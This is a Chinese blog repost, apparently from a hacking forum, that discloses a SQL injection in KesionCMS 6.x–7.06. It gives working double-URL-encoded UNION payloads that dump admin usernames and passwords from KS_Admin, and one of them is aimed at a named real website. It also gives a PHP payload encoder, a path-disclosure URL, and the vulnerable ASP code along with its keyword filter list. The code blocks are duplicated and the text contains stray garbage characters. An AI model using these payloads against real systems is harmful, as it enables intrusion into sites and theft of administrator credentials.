科讯 6.x - 7.06 SQL 注射漏洞

2011, July 27, 1:27 PM. oday收藏
Submitted by admin

作者:goingta www.t00ls.net
网站:http://www.zzfhw.com
某日逛t00ls.net的时候 看到论坛图片随机显示哪里有一张 标题为 科讯 6.x - 7.06 SQL 注射漏洞 - 低调求发展

点进去看  原来核心会员们又在xxoo

我没权限看 自然是看不了了
仔细看下图片 - 低调求发展

暴露了存在漏洞的文件名
于是自己也下一套下来看了下

刚学asp 不是很精通
后来还是成功爆出账户密码
拿去官方测试,也还存在
漏洞通知官方,已补。
不敢私藏,分享一下
非主流黑客别用来修改人家主页啊,没得前途
http://www.zzfhw.com/user/reg/regajax.asp?action=getcityoption&province=goingta%2527%2520union%2520%2573%2565%256C%2565%2563%2574%25201,username%252B%2527%257C%2527%252Bpassword%2520from%2520KS_Admin%2500

 

 

============================================================================

 

author:my5t3rywww.t00ls.net! B6 F$ d9 r1 U! s0 H  x  a; |
转载请注明:t00ls.net
漏洞位于注册页面的\User\Reg\RegAjax.asp 中的24 - 46行 和 254 -270 行 代码如下:01 Class Ajax_Check
02         Private KS
03                 Private Sub Class_Initialize()
04                   Set KS=New PublicCls
05                 End Sub
06         Private Sub Class_Terminate()
07                  Set KS=Nothing
08                 End Sub
09                 Public Sub Kesion()
10                   
11                   Select Case KS.S("Action")
12                    Case "checkusername"
13                     Call CheckUserName()
14                    Case "checkemail"
15                     Call CheckEmail()
16                    Case "checkcode"
17                     Call CheckCode()
18                    Case "getregform"
19                     Call GetRegForm()
20                    Case "getcityoption"
21                     Call getCityOption()
22                   End Select
23                 End Sub
24  
25 ……略去无关代码
26  
27                 Sub getCityOption()
28                   Dim Province,XML,Node
29                   Province=UnEscape(KS.S("Province"))  //注意这里
30                   Dim RS:Set RS=Server.CreateObject("ADODB.RECORDSET")
31                   RS.Open "Select top 200 a.ID,a.City From KS_Province a Inner Join KS_Province b On A.ParentID=B.ID Where B.City='" & Province & "' order by a.orderid,a.id",conn,1,1
32                   If Not RS.Eof Then
33                     Set XML=KS.RsToXml(Rs,"row","")
34                   End If
35                   RS.Close : Set RS=Nothing
36                   If IsObject(XML) Then
37                    For Each Node In XML.DocumentElement.SelectNodes("row")
38                       KS.Echo "<option value=""" & node.SelectSingleNode("@city").text &""">" & node.SelectSingleNode("@city").text &"</option>"
39                    Next
40                   End If
41                   Set XML=Nothing
42                 End Sub
43 End Class
01 Class Ajax_Check
02         Private KS
03                 Private Sub Class_Initialize()
04                   Set KS=New PublicCls
05                 End Sub
06         Private Sub Class_Terminate()
07                  Set KS=Nothing
08                 End Sub
09                 Public Sub Kesion()
10                   
11                   Select Case KS.S("Action")
12                    Case "checkusername"
13                     Call CheckUserName()
14                    Case "checkemail"
15                     Call CheckEmail()
16                    Case "checkcode"
17                     Call CheckCode()
18                    Case "getregform"
19                     Call GetRegForm()
20                    Case "getcityoption"
21                     Call getCityOption()
22                   End Select
23                 End Sub
24  
25 ……略去无关代码
26  
27                 Sub getCityOption()
28                   Dim Province,XML,Node
29                   Province=UnEscape(KS.S("Province"))  //注意这里
30                   Dim RS:Set RS=Server.CreateObject("ADODB.RECORDSET")
31                   RS.Open "Select top 200 a.ID,a.City From KS_Province a Inner Join KS_Province b On A.ParentID=B.ID Where B.City='" & Province & "' order by a.orderid,a.id",conn,1,1
32                   If Not RS.Eof Then
33                     Set XML=KS.RsToXml(Rs,"row","")
34                   End If
35                   RS.Close : Set RS=Nothing
36                   If IsObject(XML) Then
37                    For Each Node In XML.DocumentElement.SelectNodes("row")
38                       KS.Echo "<option value=""" & node.SelectSingleNode("@city").text &""">" & node.SelectSingleNode("@city").text &"</option>"
39                    Next
40                   End If
41                   Set XML=Nothing
42                 End Sub
43 End Class

以上代码中的Province=UnEscape(KS.S("Province")) 调用自定义函数KS.S进行过滤,接着又调用UnEscape函数解码! - 低调求发展" Q8 @/ Z( n/ x6 H- m
- 低调求发展' R8 t! h+ Y0 C5 T
其中KS.S 函数 与UnEscape函数 原型如下:01     Function DelSql(Str)
02             Dim SplitSqlStr,SplitSqlArr,I
03             SplitSqlStr="dbcc|alter|drop|*|and |exec|or |insert|select|delete|update|count |master|truncate|declare|char|mid|chr|set |where|xp_cmdshell"
04             SplitSqlArr = Split(SplitSqlStr,"|")
05             For I=LBound(SplitSqlArr) To Ubound(SplitSqlArr)
06                     If Instr(LCase(Str),SplitSqlArr(I))>0 Then
07                             Die "<script>alert('系统警告!\n\n1、您提交的数据有恶意字符" & SplitSqlArr(I) &";\n2、您的数据已经被记录;\n3、您的IP:"&GetIP&";\n4、操作日期:"&Now&";\n                Powered By Kesion.Com!');window.close();</script>"
08                     End if
09             Next
10             DelSql = Str
11 End Function
12     '取得Request.Querystring 或 Request.Form 的值
13     Public Function S(Str)
14      S = DelSql(Replace(Replace(Request(Str), "'", ""), """", ""))
15     End Function
01     Function DelSql(Str)
02             Dim SplitSqlStr,SplitSqlArr,I
03             SplitSqlStr="dbcc|alter|drop|*|and |exec|or |insert|select|delete|update|count |master|truncate|declare|char|mid|chr|set |where|xp_cmdshell"
04             SplitSqlArr = Split(SplitSqlStr,"|")
05             For I=LBound(SplitSqlArr) To Ubound(SplitSqlArr)
06                     If Instr(LCase(Str),SplitSqlArr(I))>0 Then
07                             Die "<script>alert('系统警告!\n\n1、您提交的数据有恶意字符" & SplitSqlArr(I) &";\n2、您的数据已经被记录;\n3、您的IP:"&GetIP&";\n4、操作日期:"&Now&";\n                Powered By Kesion.Com!');window.close();</script>"
08                     End if
09             Next
10             DelSql = Str
11 End Function
12     '取得Request.Querystring 或 Request.Form 的值
13     Public Function S(Str)
14      S = DelSql(Replace(Replace(Request(Str), "'", ""), """", ""))
15     End Function

01 Function UnEscape(str)
02                 Dim x
03     x=InStr(str,"%") 
04     Do While x>0
05         UnEscape=UnEscape&Mid(str,1,x-1)
06         If LCase(Mid(str,x+1,1))="u" Then
07             UnEscape=UnEscape&ChrW(CLng("&H"&Mid(str,x+2,4)))
08             str=Mid(str,x+6)
09         Else
10             UnEscape=UnEscape&Chr(CLng("&H"&Mid(str,x+1,2)))
11             str=Mid(str,x+3)
12         End If
13         x=InStr(str,"%")
14     Loop
15     UnEscape=UnEscape&str
16 End Function
01 Function UnEscape(str)
02                 Dim x
03     x=InStr(str,"%") 
04     Do While x>0
05         UnEscape=UnEscape&Mid(str,1,x-1)
06         If LCase(Mid(str,x+1,1))="u" Then
07             UnEscape=UnEscape&ChrW(CLng("&H"&Mid(str,x+2,4)))
08             str=Mid(str,x+6)
09         Else
10             UnEscape=UnEscape&Chr(CLng("&H"&Mid(str,x+1,2)))
11             str=Mid(str,x+3)
12         End If
13         x=InStr(str,"%")
14     Loop
15     UnEscape=UnEscape&str
16 End Function

这里编码出现混乱,产生了与php的二次编码类似的漏洞,利用比较简单,可以union:
http://localhost/user/reg/regajax.asp?action=getcityoption&province=%2527%2520%2575%256e%2569%256f%256e%2520%2553%2565%256c%2565%2563%2574%2520%2574%256f%2570%2520%2531%2530%2520%2541%2564%256d%2569%256e%2549%2544%252c%2555%2573%2565%2572%254e%2561%256d%2565%2526%2563%2568%2572%2528%2531%2532%2534%2529%2526%2550%2561%2573%2573%2557%256f%2572%2564%2520%2546%2572%256f%256d%2520%254b%2553%255f%2541%2564%256d%2569%256e%2500
Security3 I! Y& Y3 Z/ K; U  I
上面的利用针对ACCESS,MSSQL需要改下SQL语句:1 <?php
2 $str = "' union Select top 10 AdminID,UserName&chr(124)&PassWord From KS_Admin";
3 for ($i=0; $i<=strlen($str); $i++){
4         $temp .= "%25".base_convert(ord($str[$i]),10,16);
5 }
6 echo $temp."0";
7 ?>
1 <?php
2 $str = "' union Select top 10 AdminID,UserName&chr(124)&PassWord From KS_Admin";
3 for ($i=0; $i<=strlen($str); $i++){
4         $temp .= "%25".base_convert(ord($str[$i]),10,16);
5 }
6 echo $temp."0";
7 ?>

修改' union Select top 10 AdminID,UserName&chr(124)&PassWord From KS_Admin为相应的SQL语句即可。(MSSQL直接备份差异比较方便)

因为解码的时候进行了CLng类型转换,提交字符可以使其报错从而爆出物理路径 - 低调求发展9 @# p( E" u% a3 l
爆物理路径:http://localhost/user/reg/regajax.asp?action=getcityoption&province=%25i 

大小: 32.98 K
尺寸: 469 x 252
浏览: 44 次
点击打开新窗口浏览全图大小: 64.99 K
尺寸: 420 x 500
浏览: 40 次
点击打开新窗口浏览全图

 

Tags: 科讯

« 上一篇 | 下一篇 »

只显示10条记录相关文章
科讯kesion 6.x - 7.06 继续利用 (浏览: 26785, 评论: 0)
科讯kesion 6.x - 7.06 第二枚注射漏洞 (浏览: 15613, 评论: 0)
科讯 v6.5 CMS Oday (浏览: 8123, 评论: 0)
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):